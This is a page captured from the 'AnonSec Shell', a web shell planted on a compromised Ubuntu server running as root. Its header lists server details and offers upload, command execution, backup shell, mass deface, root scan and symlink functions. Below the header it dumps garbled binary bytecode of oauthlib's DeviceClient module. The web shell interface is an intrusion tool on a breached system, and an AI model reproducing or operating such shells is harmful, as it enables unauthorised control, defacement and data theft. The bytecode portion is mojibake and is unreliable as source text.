AnonSec Shell
Server IP : 209.38.156.173  /  Your IP : 216.73.216.122   [ Reverse IP ]
Web Server : Apache/2.4.52 (Ubuntu)
System : Linux lakekumayuhotel 5.15.0-136-generic #147-Ubuntu SMP Sat Mar 15 15:53:30 UTC 2025 x86_64
User : root ( 0)
PHP Version : 8.1.2-1ubuntu2.22
Disable Function : NONE
Domains : 2 Domains
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /lib/python3/dist-packages/oauthlib/oauth2/rfc8628/clients/__pycache__/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     [ BACKUP SHELL ]     [ JUMPING ]     [ MASS DEFACE ]     [ SCAN ROOT ]     [ SYMLINK ]     

Current File : /lib/python3/dist-packages/oauthlib/oauth2/rfc8628/clients/__pycache__/device.cpython-310.pyc
o

���a&�@s\dZddlmZmZddlmZddlmZddlm	Z	m
Z
ddlmZGdd�de�Z
d	S)
z�
oauthlib.oauth2.rfc8628
~~~~~~~~~~~~~~~~~~~~~~~

This module is an implementation of various logic needed
for consuming and providing OAuth 2.0 Device Authorization RFC8628.
�)�BackendApplicationClient�Client)�InsecureTransportError)�prepare_token_request)�is_secure_transport�
list_to_scope)�add_params_to_urics<eZdZdZdZ�fdd�Zddd�Z			d
d
d�Z�ZS)�DeviceClienta�A public client utilizing the device authorization workflow.

    The client can request an access token using a device code and
    a public client id associated with the device code as defined
    in RFC8628.

    The device authorization grant type can be used to obtain both
    access tokens and refresh tokens and is intended to be used in
    a scenario where the device being authorized does not have a
    user interface that is suitable for performing authentication.
    z,urn:ietf:params:oauth:grant-type:device_codecs$t�j|fi|��|�d�|_dS)N�
client_secret)�super�__init__�getr
)�self�	client_id�kwargs��	__class__��H/usr/lib/python3/dist-packages/oauthlib/oauth2/rfc8628/clients/device.pyr szDeviceClient.__init__NcKs�t|�st��|dur|jn|}d|jfd|jfg}|jdur'|�d|jf�|r2|�dt|�f�|D]}||rE|�t|�||f�q4t	||�S)Nr�
grant_typer
�scope)
rrrrrr
�appendr�strr)r�urirr�params�krrr�prepare_request_uri$s
�
z DeviceClient.prepare_request_uri�FcKs>|j|d<||d<|dur|jn|}t|jf|||d�|��S)aAdd device_code to request body

        The client makes a request to the token endpoint by adding the
        device_code as a parameter using the
        "application/x-www-form-urlencoded" format to the HTTP request
        body.

        :param body: Existing request body (URL encoded string) to embed parameters
                     into. This may contain extra paramters. Default ''.
        :param scope:   The scope of the access request as described by
                        `Section 3.3`_.

        :param include_client_id: `True` to send the `client_id` in the
                                  body of the upstream request. This is required
                                  if the client is not authenticating with the
                                  authorization server as described in
                                  `Section 3.2.1`_. False otherwise (default).
        :type include_client_id: Boolean

        :param kwargs:  Extra credentials to include in the token request.

        The prepared body will include all provided device_code as well as
        the ``grant_type`` parameter set to
        ``urn:ietf:params:oauth:grant-type:device_code``::

            >>> from oauthlib.oauth2 import DeviceClient
            >>> client = DeviceClient('your_id', 'your_code')
            >>> client.prepare_request_body(scope=['hello', 'world'])
            'grant_type=urn:ietf:params:oauth:grant-type:device_code&scope=hello+world'

        .. _`Section 3.4`: https://datatracker.ietf.org/doc/html/rfc8628#section-3.4
        r�include_client_idN)�body�device_coder)rrrr)rr rrrrrrr�prepare_request_body7s
#��z!DeviceClient.prepare_request_body)N)rNF)	�__name__�
__module__�__qualname__�__doc__rrrr!�
__classcell__rrrrr	s
�r	N)r%�oauthlib.oauth2rr�oauthlib.oauth2.rfc6749.errorsr�"oauthlib.oauth2.rfc6749.parametersr�oauthlib.oauth2.rfc6749.utilsrr�oauthlib.commonrr	rrrr�<module>s

Anon7 - 2022
AnonSec Team